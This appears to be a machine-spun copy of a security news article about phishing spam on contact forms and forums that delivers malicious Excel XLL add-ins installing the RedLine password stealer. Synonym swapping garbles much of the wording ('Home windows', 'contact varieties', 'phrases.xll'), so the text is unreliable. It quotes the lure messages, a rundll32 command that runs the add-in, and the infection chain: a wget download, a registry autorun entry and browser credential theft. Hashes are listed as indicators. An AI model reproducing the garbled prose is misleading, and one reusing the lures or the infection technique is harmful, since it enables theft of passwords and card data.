Malicious Excel XLL add-ins push RedLine password-stealing malware
5 mins read

Malicious Excel XLL add-ins push RedLine password-stealing malware


Phishing malware

Cybercriminals are spamming web site contact varieties and dialogue boards to distribute Excel XLL information that obtain and set up the RedLine password and information-stealing malware.

RedLine is an information-stealing Trojan that steals cookies, consumer names and passwords, and bank cards saved in net browsers, in addition to FTP credentials and information from an contaminated gadget.

Along with stealing information, RedLine can execute instructions, obtain and run additional malware, and create screenshots of the energetic Home windows display screen.

All of this information is collected and despatched again to the attackers to be offered on felony marketplaces or used for different malicious and fraudulent exercise.

Spamming contact varieties and dialogue boards

Over the previous two weeks, BleepingComputer’s contact varieties have been spammed quite a few occasions with completely different phishing lures, together with faux promoting requests, vacation reward guides, and web site promotions.

After researching the lures, BleepingComputer has found this to be a widespread marketing campaign focusing on many web sites utilizing public boards or article remark programs.

In some phishing lures seen by BleepingComputer, the risk actors have created faux web sites to host the malicious Excel XLL information used to put in the malware.

For instance, one marketing campaign used the next spam message and a faux web site that imitated the respectable Plutio website.

The whole lot you might want to run your corporation.  Handle tasks, create dazzling proposals  and receives a commission sooner. Black Friday! All plans are FREE, no bank card required. 

Fake Plutio website developed to push malicious XLL files
Pretend Plutio web site developed to push malicious XLL information
Supply: BleepingComputer

Different spam messages fake to be cost stories, requests for promoting, or reward guides with hyperlinks to malicious XLL information hosted on Google Drive, as proven under.

Malicious XLL file hosted on Google Drive
Malicious XLL file hosted on Google Drive
Supply: BleepingComputer

Of specific curiosity is a lure focusing on website homeowners with requests to promote on their website and asking them to overview the phrases of the provide. This results in a malicious ‘phrases.xll‘ file that installs the malware.

Promote us promoting area in your website from $ 500 
You possibly can learn our phrases on the hyperlink under 
https://drive.google[.]com/file/d/xxx/view?usp=sharing

Different lures seen by BleepingComputer this week are:

Thanks for utilizing our app. Your cost has been permitted. You possibly can see your cost report on the hyperlink under https://xxx[.]hyperlink/report.xll

Google simply revealed the 100 hottest items of 2021 
 
I received $10.000. Need it too? Learn and settle for the phrases 
https://drive.google[.]com/file/d/xxx/view?usp=sharing

Abusing Excel XLL information

These spam campaigns are designed to push malicious Excel XLL information that obtain and set up the RedLine malware on victims’ Home windows gadgets.

An XLL file is an add-in that permits builders to increase the performance of Excel by studying and writing information, importing information from different sources, or creating customized features to carry out varied duties.

XLL information are merely a DLL file that features an ‘xlAutoOpen’ operate executed by Microsoft Excel when the add-in is opened.

Opening malicious add-in in Excel
Opening malicious add-in in Excel
Supply: BleepingComputer

Whereas checks performed by BleepingComputer and safety researcher TheAnalyst, with who we mentioned the assault, should not appropriately loading the XLL file, they could work in different variations of Microsoft Excel.

Nonetheless, manually executing the DLL with the regsvr32.exe command or the ‘rundll32 identify.xll, xlAutoOpen‘ command will extract the wget.exe program to the %UserProfile% folder and use it to obtain the RedLine binary from a distant website.

XLL DLL downloading the RedLine malware using wget
XLL DLL downloading the RedLine malware utilizing wget
Supply: BleepingComputer

This malicious binary is saved as %UserProfilepercentJavaBridge32.exe [VirusTotal] after which executed.

A Registry autorun entry may even be created to mechanically launch the RedLine information-stealer each time victims log into Home windows. 

RedLine autorun added to the Windows Registry
RedLine autorun added to the Home windows Registry
Supply: BleepingComputer

As soon as the malware is executed, it should seek for useful information to steal, together with credentials and bank cards saved within the Chrome, Edge, Firefox, Courageous, and Opera browsers.

You probably have change into a sufferer of this marketing campaign, it’s best to assume that your saved passwords are compromised and instantly change them. Moreover, when you have bank cards saved in your browsers, it’s best to contact your bank card firm to alert them of the incident.

As XLL information are executables, risk actors can use them to carry out quite a lot of malicious habits on a tool. Subsequently, it’s essential to by no means open one except it comes from a trusted supply.

These information should not typically despatched as attachments however as a substitute put in by means of one other program or by way of your Home windows admin.

Subsequently, should you obtain an e-mail or different message distributing all these information, merely delete the message and report it as spam.

IOCs

XLL information:

phrases.xll, report.xll, terms_of_use.xll
f6c06615e35798274dfa9c4b28aaa6d94220804e766e9a70c4f0dab4779ee1db

RedLine:

JavaBridge32.exe: 626db53138176b8a371878ebaa2dbbd724be9a74f9f82ef9ebb7b7bfc0c6b2e9



Leave a Reply

Your email address will not be published. Required fields are marked *